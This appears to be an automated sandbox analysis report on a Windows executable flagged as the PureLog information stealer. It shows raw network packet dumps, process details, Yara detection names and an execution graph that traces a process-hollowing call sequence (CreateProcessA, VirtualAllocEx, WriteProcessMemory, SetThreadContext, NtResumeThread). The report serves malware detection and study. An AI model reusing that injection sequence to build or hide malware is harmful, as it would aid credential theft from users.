                                            Oct 15, 2024 22:48:00.681368113 CEST1236INData Raw: 22 67 61 64 18 58 bf 28 e1 91 16 b3 0c 39 23 8f 76 d3 4e 92 05 71 73 11 f6 9a 83 08 1f dc 84 b4 75 4e e1 5d 18 6d f4 3a 98 2c c6 46 6b 8e 67 dc 83 be f1 1f da 80 ed 6e b1 b8 b0 51 b3 78 51 56 2b b2 31 99 fb 76 85 52 ee d0 28 9a b2 42 b1 97 53 ba
                                            Data Ascii: "gadX(9#vNqsuN]m:,FkgnQxQV+1vR(BS!LkJtr4?3dV`Jebi=E}={U{~'L6^4z6&~J+.@58CxYitqBa?LJH(^CZ`.Te "]:
                                            Oct 15, 2024 22:48:00.681401968 CEST1236INData Raw: 0c 48 95 37 63 e2 f8 17 26 ea eb a4 16 9d e7 92 80 07 b5 d5 db 39 db 98 4f 00 5f 67 b4 8a 38 b3 55 ad 1f bd 34 74 b4 f3 f7 dd d3 8a 82 4d 00 0b c9 6a c2 79 7a 9c 08 99 3e 30 97 d6 bf 79 60 ef 2d ce 4a 09 b9 d5 f6 61 07 dd bf b6 bc 64 2f f1 a8 60
                                            Data Ascii: H7c&9O_g8U4tMjyz>0y`-Jad/`f31y[#oLxx6<Z?RAaX)f3x^<1+{E6SXZv1j*2w>%?NS"'YNN9,]KhrN[%E9bhc5`@ne
                                            Oct 15, 2024 22:48:00.681433916 CEST848INData Raw: 50 07 f7 44 34 a3 25 77 11 5e fa 3b 3b 33 1b 41 27 45 56 d7 90 02 7a 66 07 ef 18 73 14 b4 f8 80 86 eb 08 93 94 a8 18 b4 84 00 f3 6c cc c8 a2 9f 06 76 8f eb ae e8 a7 2e b5 ee 2c 0e 36 f5 e7 18 5f 7c e2 1e f3 db 00 4d 2e 2a dd 3e 36 bd 39 d3 e5 8b
                                            Data Ascii: PD4%w^;;3A'EVzfslv.,6_|M.*>69X),N|*T'QbOq8s]g_Tvw@\t};V7;5Ra4,87 zPYYdhIeQ~$ ">K\dpa\fQdDtt
                                            Oct 15, 2024 22:48:00.681469917 CEST1236INData Raw: 5e f4 49 5c af df 6e cd c8 d6 8b a4 97 af b7 48 4e a1 ec 5a 2a 1f e0 82 ed 08 9e c8 5a 75 43 74 9e d6 15 71 7a 15 87 83 c6 11 b1 9d 81 79 86 36 6a 59 9e 6b 18 e8 37 c6 36 ec 3c 4c f4 c3 44 86 e0 04 31 1d 78 33 4e ad c1 69 db d2 75 a6 67 47 b7 99
                                            Data Ascii: ^I\nHNZ*ZuCtqzy6jYk76<LD1x3NiugG#:Ths]Br34n=n`XXdW\_x~$>y7kwzp$9pIo`OkGQs=A5[H94kt&cMqM [L QY$TGL
                                            Oct 15, 2024 22:48:00.681498051 CEST212INData Raw: d5 6f 84 5f f4 42 75 eb 2e 0f 2b c3 66 36 b9 2f 7c d7 c9 86 d9 b1 f6 d1 6c e5 fd ab e3 90 dc 05 81 0e 9d 93 e3 e0 49 cc ca 69 e4 7a 53 0a f9 97 05 40 73 e8 81 d3 f3 f9 39 2c a9 e9 3d c8 9f 25 13 b3 db 53 29 35 ec 04 55 da 33 9f f1 3e 94 d0 f6 3f
                                            Data Ascii: o_Bu.+f6/|lIizS@s9,=%S)5U3>?hK)9(HD3H{Ms)Xj<td(=`b=Os)*Ou4WV>;OmRytS`[F
                                            Oct 15, 2024 22:48:00.681533098 CEST1236INData Raw: 9a bd 0f 4d 3c b8 bc f1 e7 f7 eb 7e c2 45 3c 7f 95 ad e8 ca 80 56 2b 2d 96 a9 2a d6 c5 78 1f a7 55 c9 23 10 83 10 ac bc b1 bf a2 0f 3e 54 bb 59 ce 66 66 d4 d2 5f b5 11 a6 f2 22 60 b8 00 a0 8b 7f 92 88 8b 7c c7 c0 d7 ae b8 bb 23 c6 30 61 aa 39 93
                                            Data Ascii: M<~E<V+-*xU#>TYff_"`|#0a9uey w)1V|nufWG#YRppCF9#`)*?F_rRznyx{xX5r[/*!P?*H}{+bX"
                                            Oct 15, 2024 22:48:00.686693907 CEST1236INData Raw: d5 f4 13 bb ee 8f 26 4f 2f a9 6c 1f 38 42 d6 86 77 94 2c e4 00 f2 5e e1 28 77 b3 13 4c 57 af 07 75 66 71 95 4c 59 07 6e 40 22 cc 93 6d d7 b9 1a b6 3e 8b 5f 0b 60 e8 7e 8c 59 fb 8a c5 f5 a2 7d ff 6f 6d 06 61 ae 01 0b cb 93 e8 61 51 11 d2 0a 84 ee
                                            Data Ascii: &O/l8Bw,^(wLWufqLYn@"m>_`~Y}omaaQ\[,{:r-wq1w:Ysi)1%(oZ)lbRwNqFj&O_a}BSp#"j98>0j+CQ;x.Iq`Z


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:16:47:58
                                            Start date:15/10/2024
                                            Path:C:\Users\user\Desktop\justleadership.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\justleadership.exe"
                                            Imagebase:0x6f0000
                                            File size:6'369'280 bytes
                                            MD5 hash:D84496A9A986A9425B66D64560D8F1E1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2160604823.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2150003802.000000000434A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:16:48:43
                                            Start date:15/10/2024
                                            Path:C:\Users\user\Desktop\justleadership.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\justleadership.exe"
                                            Imagebase:0x960000
                                            File size:6'369'280 bytes
                                            MD5 hash:D84496A9A986A9425B66D64560D8F1E1
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.2147404072.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:16:48:43
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:12.5%
                                              Dynamic/Decrypted Code Coverage:96%
                                              Signature Coverage:3%
                                              Total number of Nodes:297
                                              Total number of Limit Nodes:19
                                              execution_graph 65844 6c0e500 65845 6c0e540 VirtualAlloc 65844->65845 65847 6c0e57a 65845->65847 65870 6c076a1 65872 6c0d038 VirtualProtect 65870->65872 65871 6c076bc 65872->65871 65848 173a830 65849 173a831 65848->65849 65852 173a928 65849->65852 65850 173a83f 65853 173a939 65852->65853 65854 173a95c 65852->65854 65853->65854 65855 173ab60 GetModuleHandleW 65853->65855 65854->65850 65856 173ab8d 65855->65856 65856->65850 65857 6c06d04 65860 6c0d038 VirtualProtect 65857->65860 65858 6c001cf 65859 6c0d038 VirtualProtect 65858->65859 65859->65858 65860->65858 65873 160d104 65874 160d11c 65873->65874 65875 160d177 65874->65875 65877 6c0daf0 65874->65877 65878 6c0db18 65877->65878 65881 6c0dfb0 65878->65881 65879 6c0db3f 65882 6c0dfdd 65881->65882 65883 6c0d038 VirtualProtect 65882->65883 65885 6c0e173 65882->65885 65884 6c0e164 65883->65884 65884->65879 65885->65879 65886 6c099aa 65887 6c099c6 65886->65887 65889 6c0d038 VirtualProtect 65887->65889 65888 6c001cf 65890 6c0d038 VirtualProtect 65888->65890 65889->65888 65890->65888 65748 173ccd8 65749 173cd1e GetCurrentProcess 65748->65749 65751 173cd70 GetCurrentThread 65749->65751 65752 173cd69 65749->65752 65753 173cda6 65751->65753 65754 173cdad GetCurrentProcess 65751->65754 65752->65751 65753->65754 65757 173cde3 65754->65757 65755 173ce0b GetCurrentThreadId 65756 173ce3c 65755->65756 65757->65755 65758 1734ac0 65761 1734670 65758->65761 65760 1734ace 65762 173467b 65761->65762 65765 1734804 65762->65765 65764 1734bfd 65764->65760 65766 173480f 65765->65766 65769 1734834 65766->65769 65768 1734cda 65768->65764 65770 173483f 65769->65770 65773 1734864 65770->65773 65772 1734ddc 65772->65768 65774 173486f 65773->65774 65779 1737930 65774->65779 65776 1737e19 65776->65772 65777 1737bf0 65777->65776 65783 173c8e1 65777->65783 65780 173793b 65779->65780 65781 17393da 65780->65781 65788 1739429 65780->65788 65781->65777 65784 173c911 65783->65784 65785 173c935 65784->65785 65792 173cbb0 65784->65792 65796 173cbc0 65784->65796 65785->65776 65789 173947b 65788->65789 65790 1739486 KiUserCallbackDispatcher 65789->65790 65791 17394b0 65789->65791 65790->65791 65791->65781 65793 173cbc0 65792->65793 65794 173cc07 65793->65794 65800 173aea8 65793->65800 65794->65785 65797 173cbcd 65796->65797 65798 173cc07 65797->65798 65799 173aea8 KiUserCallbackDispatcher 65797->65799 65798->65785 65799->65798 65801 173aeb3 65800->65801 65803 173d920 65801->65803 65804 173d4e0 65801->65804 65803->65803 65805 173d4eb 65804->65805 65806 1734864 KiUserCallbackDispatcher 65805->65806 65807 173d98f 65806->65807 65807->65803 65864 6d37380 65865 6d373ce NtProtectVirtualMemory 65864->65865 65867 6d37418 65865->65867 65868 173cf20 DuplicateHandle 65869 173cfb6 65868->65869 65734 6c09b56 65735 6c001cf 65734->65735 65737 6c0d038 65735->65737 65739 6c0d05f 65737->65739 65741 6c0d488 65739->65741 65742 6c0d4d0 VirtualProtect 65741->65742 65744 6c0d11c 65742->65744 65744->65735 65891 6b8784f 65892 6b87855 65891->65892 65896 6a959c8 65892->65896 65901 6a959b8 65892->65901 65893 6b86e37 65897 6a959dd 65896->65897 65898 6a959f3 65897->65898 65906 6a95edf 65897->65906 65911 6a95fd4 65897->65911 65898->65893 65902 6a959dd 65901->65902 65903 6a959f3 65902->65903 65904 6a95edf 10 API calls 65902->65904 65905 6a95fd4 10 API calls 65902->65905 65903->65893 65904->65903 65905->65903 65907 6a95eee 65906->65907 65908 6a95e6d 65907->65908 65916 6a972a8 65907->65916 65928 6a9729b 65907->65928 65908->65898 65912 6a95fda 65911->65912 65914 6a972a8 10 API calls 65912->65914 65915 6a9729b 10 API calls 65912->65915 65913 6a95e6d 65913->65898 65914->65913 65915->65913 65917 6a972bd 65916->65917 65940 6a9770b 65917->65940 65944 6a972e9 65917->65944 65948 6a97765 65917->65948 65952 6a974a6 65917->65952 65956 6a975dc 65917->65956 65960 6a975f3 65917->65960 65964 6a9748d 65917->65964 65968 6a977ec 65917->65968 65972 6a972f8 65917->65972 65918 6a972df 65918->65908 65929 6a972bd 65928->65929 65931 6a972e9 10 API calls 65929->65931 65932 6a972f8 10 API calls 65929->65932 65933 6a9770b 10 API calls 65929->65933 65934 6a9748d 10 API calls 65929->65934 65935 6a977ec 10 API calls 65929->65935 65936 6a975dc 10 API calls 65929->65936 65937 6a975f3 10 API calls 65929->65937 65938 6a97765 10 API calls 65929->65938 65939 6a974a6 10 API calls 65929->65939 65930 6a972df 65930->65908 65931->65930 65932->65930 65933->65930 65934->65930 65935->65930 65936->65930 65937->65930 65938->65930 65939->65930 65941 6a97363 65940->65941 65942 6a97553 65941->65942 65976 6a97afb 65941->65976 65942->65918 65945 6a97325 65944->65945 65946 6a97553 65945->65946 65947 6a97afb 10 API calls 65945->65947 65946->65918 65947->65945 65950 6a97363 65948->65950 65949 6a97553 65949->65918 65950->65949 65951 6a97afb 10 API calls 65950->65951 65951->65950 65954 6a97363 65952->65954 65953 6a97553 65953->65918 65954->65953 65955 6a97afb 10 API calls 65954->65955 65955->65954 65958 6a97363 65956->65958 65957 6a97553 65957->65918 65958->65957 65959 6a97afb 10 API calls 65958->65959 65959->65958 65961 6a97363 65960->65961 65962 6a97553 65961->65962 65963 6a97afb 10 API calls 65961->65963 65962->65918 65963->65961 65966 6a97363 65964->65966 65965 6a97553 65965->65918 65966->65965 65967 6a97afb 10 API calls 65966->65967 65967->65966 65969 6a97363 65968->65969 65969->65968 65970 6a97553 65969->65970 65971 6a97afb 10 API calls 65969->65971 65970->65918 65971->65969 65974 6a97325 65972->65974 65973 6a97553 65973->65918 65974->65973 65975 6a97afb 10 API calls 65974->65975 65975->65974 65977 6a97b1d 65976->65977 65978 6a97b3f 65977->65978 65989 6a9891e 65977->65989 65994 6a985ad 65977->65994 65999 6a97ced 65977->65999 66004 6a980ea 65977->66004 66009 6a9864d 65977->66009 66014 6a97e59 65977->66014 66018 6a98776 65977->66018 66023 6a98523 65977->66023 66028 6a97e15 65977->66028 66034 6a987fc 65977->66034 65978->65941 65990 6a98928 65989->65990 66039 6a9a73b 65990->66039 66044 6a9a748 65990->66044 65991 6a9898b 65995 6a985c5 65994->65995 66057 6d38280 65995->66057 66061 6d3827b 65995->66061 65996 6a97ca1 66000 6a97cfa 65999->66000 66001 6a97ca1 66000->66001 66065 6d38428 66000->66065 66069 6d38430 66000->66069 66005 6a9810b 66004->66005 66007 6d38280 WriteProcessMemory 66005->66007 66008 6d3827b WriteProcessMemory 66005->66008 66006 6a97ca1 66007->66006 66008->66006 66010 6a98665 66009->66010 66073 6a99078 66010->66073 66078 6a99088 66010->66078 66011 6a97ca1 66101 6a9a870 66014->66101 66106 6a9a880 66014->66106 66015 6a97e75 66019 6a98780 66018->66019 66021 6d38430 NtResumeThread 66019->66021 66022 6d38428 NtResumeThread 66019->66022 66020 6a97ca1 66021->66020 66022->66020 66024 6a9852d 66023->66024 66026 6a9a748 2 API calls 66024->66026 66027 6a9a73b 2 API calls 66024->66027 66025 6a9898b 66026->66025 66027->66025 66029 6a97e9e 66028->66029 66031 6a97ca1 66028->66031 66032 6d37d60 Wow64SetThreadContext 66029->66032 66033 6d37d5b Wow64SetThreadContext 66029->66033 66030 6a97eb9 66032->66030 66033->66030 66035 6a98819 66034->66035 66037 6d38280 WriteProcessMemory 66035->66037 66038 6d3827b WriteProcessMemory 66035->66038 66036 6a98864 66037->66036 66038->66036 66040 6a9a75d 66039->66040 66049 6d38178 66040->66049 66053 6d38180 66040->66053 66041 6a9a77f 66041->65991 66045 6a9a75d 66044->66045 66047 6d38180 VirtualAllocEx 66045->66047 66048 6d38178 VirtualAllocEx 66045->66048 66046 6a9a77f 66046->65991 66047->66046 66048->66046 66050 6d38180 VirtualAllocEx 66049->66050 66052 6d381fd 66050->66052 66052->66041 66054 6d381c0 VirtualAllocEx 66053->66054 66056 6d381fd 66054->66056 66056->66041 66058 6d382c8 WriteProcessMemory 66057->66058 66060 6d3831f 66058->66060 66060->65996 66062 6d382c8 WriteProcessMemory 66061->66062 66064 6d3831f 66062->66064 66064->65996 66066 6d38478 NtResumeThread 66065->66066 66068 6d384ad 66066->66068 66068->66001 66070 6d38478 NtResumeThread 66069->66070 66072 6d384ad 66070->66072 66072->66001 66074 6a99088 66073->66074 66075 6a990c1 66074->66075 66083 6a99491 66074->66083 66088 6a994ef 66074->66088 66075->66011 66079 6a9909f 66078->66079 66080 6a990c1 66079->66080 66081 6a994ef 2 API calls 66079->66081 66082 6a99491 2 API calls 66079->66082 66080->66011 66081->66080 66082->66080 66084 6a99497 66083->66084 66093 6d37a54 66084->66093 66097 6d37a60 66084->66097 66089 6a99514 66088->66089 66091 6d37a60 CreateProcessA 66089->66091 66092 6d37a54 CreateProcessA 66089->66092 66090 6a99798 66091->66090 66092->66090 66094 6d37a60 CreateProcessA 66093->66094 66096 6d37c4c 66094->66096 66098 6d37ac4 CreateProcessA 66097->66098 66100 6d37c4c 66098->66100 66102 6a9a880 66101->66102 66111 6d37d5b 66102->66111 66115 6d37d60 66102->66115 66103 6a9a8ae 66103->66015 66107 6a9a895 66106->66107 66109 6d37d60 Wow64SetThreadContext 66107->66109 66110 6d37d5b Wow64SetThreadContext 66107->66110 66108 6a9a8ae 66108->66015 66109->66108 66110->66108 66113 6d37d5e Wow64SetThreadContext 66111->66113 66114 6d37ded 66113->66114 66114->66103 66116 6d37da5 Wow64SetThreadContext 66115->66116 66118 6d37ded 66116->66118 66118->66103 65808 6b87083 65809 6b8709f 65808->65809 65813 6d3e301 65809->65813 65818 6d3e310 65809->65818 65810 6b870dd 65814 6d3e325 65813->65814 65823 6d3e350 65814->65823 65827 6d3e341 65814->65827 65815 6d3e33b 65815->65810 65819 6d3e325 65818->65819 65821 6d3e341 2 API calls 65819->65821 65822 6d3e350 2 API calls 65819->65822 65820 6d3e33b 65820->65810 65821->65820 65822->65820 65825 6d3e37a 65823->65825 65824 6d3e3be 65824->65815 65825->65824 65831 6d3e708 65825->65831 65828 6d3e350 65827->65828 65829 6d3e3be 65828->65829 65830 6d3e708 2 API calls 65828->65830 65829->65815 65830->65828 65832 6d3e72d 65831->65832 65836 6d3407a 65832->65836 65840 6d34080 65832->65840 65833 6d3e748 65833->65825 65837 6d34080 SleepEx 65836->65837 65839 6d340fe 65837->65839 65839->65833 65841 6d340c0 SleepEx 65840->65841 65843 6d340fe 65841->65843 65843->65833 65745 6c0345f 65746 6c001cf 65745->65746 65747 6c0d038 VirtualProtect 65746->65747 65747->65746

                                              Executed Functions

                                              Function 06B8C121 Relevance: 16.1, Strings: 12, Instructions: 1146COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161621561.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b80000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ,oq$4$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                              • API String ID: 0-1127353760
                                              • Opcode ID: b0774d1f825c0abc9ec7bd298b8541c40d7a19b060b28b4b7058c59b5a430d07
                                              • Instruction ID: b5e87ae76fa46abb311eefcccf05644bea3c6d14b1a43ee73a7527c2395b8836
                                              • Opcode Fuzzy Hash: b0774d1f825c0abc9ec7bd298b8541c40d7a19b060b28b4b7058c59b5a430d07
                                              • Instruction Fuzzy Hash: 16B2F9B4A002188FDB54EFA5C984BADBBB6FF48300F1585A9E505AB3A5D774DC81CF60
                                              Function 06B8C457 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161621561.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b80000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ,oq$4$$kq$$kq$$kq$$kq
                                              • API String ID: 0-569362799
                                              • Opcode ID: 8f07a3a2ebda657be6ff93749de4dd83db611bfd64e8ced3d5ef4e2a6c803bbf
                                              • Instruction ID: 9a083fa6bbe1055e7ace1ac4bbb1e8c20e123475df96dad94abbae6dffa3f64e
                                              • Opcode Fuzzy Hash: 8f07a3a2ebda657be6ff93749de4dd83db611bfd64e8ced3d5ef4e2a6c803bbf
                                              • Instruction Fuzzy Hash: 4222DAB4A00215CFDB64EF64C984BA9BBB6FF48304F1581E9D509AB2A5DB34DD81CF60
                                              Function 06A43BF0 Relevance: 6.0, Strings: 4, Instructions: 956COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1336 6a43bf0-6a43c11 1337 6a43c13 1336->1337 1338 6a43c18-6a43cff 1336->1338 1337->1338 1341 6a43d05-6a43e46 1338->1341 1342 6a44401-6a44429 1338->1342 1386 6a43e4c-6a43ea7 1341->1386 1387 6a443ca-6a443f4 1341->1387 1345 6a44aa5-6a44aae 1342->1345 1347 6a44ab4-6a44acb 1345->1347 1348 6a44437-6a44441 1345->1348 1350 6a44443 1348->1350 1351 6a44448-6a4453c 1348->1351 1350->1351 1368 6a44566 1351->1368 1369 6a4453e-6a4454a 1351->1369 1373 6a4456c-6a4458c 1368->1373 1371 6a44554-6a4455a 1369->1371 1372 6a4454c-6a44552 1369->1372 1374 6a44564 1371->1374 1372->1374 1378 6a445ec-6a4466c 1373->1378 1379 6a4458e-6a445e7 1373->1379 1374->1373 1400 6a446c3-6a44706 1378->1400 1401 6a4466e-6a446c1 1378->1401 1391 6a44aa2 1379->1391 1395 6a43eac-6a43eb7 1386->1395 1396 6a43ea9 1386->1396 1398 6a443f6 1387->1398 1399 6a443fe-6a443ff 1387->1399 1391->1345 1397 6a442df-6a442e5 1395->1397 1396->1395 1402 6a43ebc-6a43eda 1397->1402 1403 6a442eb-6a44367 1397->1403 1398->1399 1399->1342 1425 6a44711-6a4471a 1400->1425 1401->1425 1406 6a43f31-6a43f46 1402->1406 1407 6a43edc-6a43ee0 1402->1407 1445 6a443b4-6a443ba 1403->1445 1410 6a43f4d-6a43f63 1406->1410 1411 6a43f48 1406->1411 1407->1406 1412 6a43ee2-6a43eed 1407->1412 1414 6a43f65 1410->1414 1415 6a43f6a-6a43f81 1410->1415 1411->1410 1416 6a43f23-6a43f29 1412->1416 1414->1415 1421 6a43f83 1415->1421 1422 6a43f88-6a43f9e 1415->1422 1418 6a43eef-6a43ef3 1416->1418 1419 6a43f2b-6a43f2c 1416->1419 1426 6a43ef5 1418->1426 1427 6a43ef9-6a43f11 1418->1427 1424 6a43faf-6a4401a 1419->1424 1421->1422 1428 6a43fa5-6a43fac 1422->1428 1429 6a43fa0 1422->1429 1430 6a4401c-6a44028 1424->1430 1431 6a4402e-6a441e3 1424->1431 1433 6a4477a-6a44789 1425->1433 1426->1427 1434 6a43f13 1427->1434 1435 6a43f18-6a43f20 1427->1435 1428->1424 1429->1428 1430->1431 1443 6a441e5-6a441e9 1431->1443 1444 6a44247-6a4425c 1431->1444 1436 6a4471c-6a44744 1433->1436 1437 6a4478b-6a44813 1433->1437 1434->1435 1435->1416 1439 6a44746 1436->1439 1440 6a4474b-6a44774 1436->1440 1472 6a4493e-6a4494a 1437->1472 1439->1440 1440->1433 1443->1444 1448 6a441eb-6a441fa 1443->1448 1446 6a44263-6a44284 1444->1446 1447 6a4425e 1444->1447 1449 6a443bc-6a443c2 1445->1449 1450 6a44369-6a443b1 1445->1450 1452 6a44286 1446->1452 1453 6a4428b-6a442aa 1446->1453 1447->1446 1455 6a44239-6a4423f 1448->1455 1449->1387 1450->1445 1452->1453 1456 6a442b1-6a442d1 1453->1456 1457 6a442ac 1453->1457 1459 6a44241-6a44242 1455->1459 1460 6a441fc-6a44200 1455->1460 1466 6a442d3 1456->1466 1467 6a442d8 1456->1467 1457->1456 1462 6a442dc 1459->1462 1464 6a44202-6a44206 1460->1464 1465 6a4420a-6a4422b 1460->1465 1462->1397 1464->1465 1468 6a44232-6a44236 1465->1468 1469 6a4422d 1465->1469 1466->1467 1467->1462 1468->1455 1469->1468 1474 6a44950-6a4499c 1472->1474 1475 6a44818-6a44821 1472->1475 1484 6a449c4-6a449df 1474->1484 1485 6a4499e-6a449c2 1474->1485 1476 6a44823 1475->1476 1477 6a4482a-6a44932 1475->1477 1476->1477 1478 6a44866-6a44897 1476->1478 1479 6a44830-6a44861 1476->1479 1480 6a4489c-6a448cd 1476->1480 1481 6a448cf-6a44900 1476->1481 1490 6a44938 1477->1490 1478->1490 1479->1490 1480->1490 1481->1490 1486 6a449e8-6a44a6c 1484->1486 1485->1486 1494 6a44a73-6a44a93 1486->1494 1490->1472 1494->1391
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2159882193.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a40000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: TJpq$Tekq$poq$xbnq
                                              • API String ID: 0-229356865
                                              • Opcode ID: 8eb163a297874dbbed6675832e8d0674b14a38121579f214fdc6cfed33fa75be
                                              • Instruction ID: ecdc691e1ec2ccbf4d78bea534d7e6069547a2fd8ba48a263f0f70002fc4c9f4
                                              • Opcode Fuzzy Hash: 8eb163a297874dbbed6675832e8d0674b14a38121579f214fdc6cfed33fa75be
                                              • Instruction Fuzzy Hash: 3EA2A575E00628DFDB64DF69C984A99BBB2FF89300F1581E9D509AB325DB319E81CF40
                                              Function 06D37379 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06D37409
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID: MemoryProtectVirtual
                                              • String ID: i\w
                                              • API String ID: 2706961497-1682270839
                                              • Opcode ID: 72f43d3cd9f997a7dece22742714bb4f2b74f4a5a57db9b123ee2762a7d4a7af
                                              • Instruction ID: ac388e3b892f459aa5b0bd81d17df39473cff94b07ceb8bacc3a44a280b70f2d
                                              • Opcode Fuzzy Hash: 72f43d3cd9f997a7dece22742714bb4f2b74f4a5a57db9b123ee2762a7d4a7af
                                              • Instruction Fuzzy Hash: 6321F2B1D013499FCB10DFAAD984ADEFBF5FF48320F20842AE519A7250C775A940CBA4
                                              Function 06D37380 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06D37409
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID: MemoryProtectVirtual
                                              • String ID: i\w
                                              • API String ID: 2706961497-1682270839
                                              • Opcode ID: a03a56113d216f7c816e71a37061bb45dd32f3ba5cf290f7720a334caa39d6dc
                                              • Instruction ID: 1985b2cfc636d8203ef16c24a41b2a56d680c47a9043363effcfce9802e33395
                                              • Opcode Fuzzy Hash: a03a56113d216f7c816e71a37061bb45dd32f3ba5cf290f7720a334caa39d6dc
                                              • Instruction Fuzzy Hash: E921DFB1D013499FCB10DFAAD984ADEFBF5FF48320F20842AE559A7250C775A944CBA4
                                              Function 06D38428 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55nativethreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtResumeThread.NTDLL(?,?), ref: 06D3849E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID: i\w
                                              • API String ID: 947044025-1682270839
                                              • Opcode ID: b6d368f4a9c4e47a665eab0dc0142c591f37348c8e77ca5ff17114f4ce6e1cba
                                              • Instruction ID: 3ad2f3f3dfd5737dace9644e16262c81bffedc8df777c2f177cc3380301fd86c
                                              • Opcode Fuzzy Hash: b6d368f4a9c4e47a665eab0dc0142c591f37348c8e77ca5ff17114f4ce6e1cba
                                              • Instruction Fuzzy Hash: 631114B1D002498FDB10DFAAC58479EFBF9AF88324F24842AD459A7250C778A945CFA4
                                              Function 06D38430 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54nativethreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtResumeThread.NTDLL(?,?), ref: 06D3849E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID: i\w
                                              • API String ID: 947044025-1682270839
                                              • Opcode ID: 04f2f937184efd337dd8d371f52d65a378c39d41bbfb79ba36e595c8e3853f3a
                                              • Instruction ID: cf4c182cc6b465deecc727975bf2c5ee03b25cacd95aaedab9b9824c176b204f
                                              • Opcode Fuzzy Hash: 04f2f937184efd337dd8d371f52d65a378c39d41bbfb79ba36e595c8e3853f3a
                                              • Instruction Fuzzy Hash: 0711F9B1D003598FDB10DFAAC54479EFBF9EF48324F10842AD459A7254C778A944CFA5
                                              Function 06D34310 Relevance: 3.0, Strings: 2, Instructions: 542COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
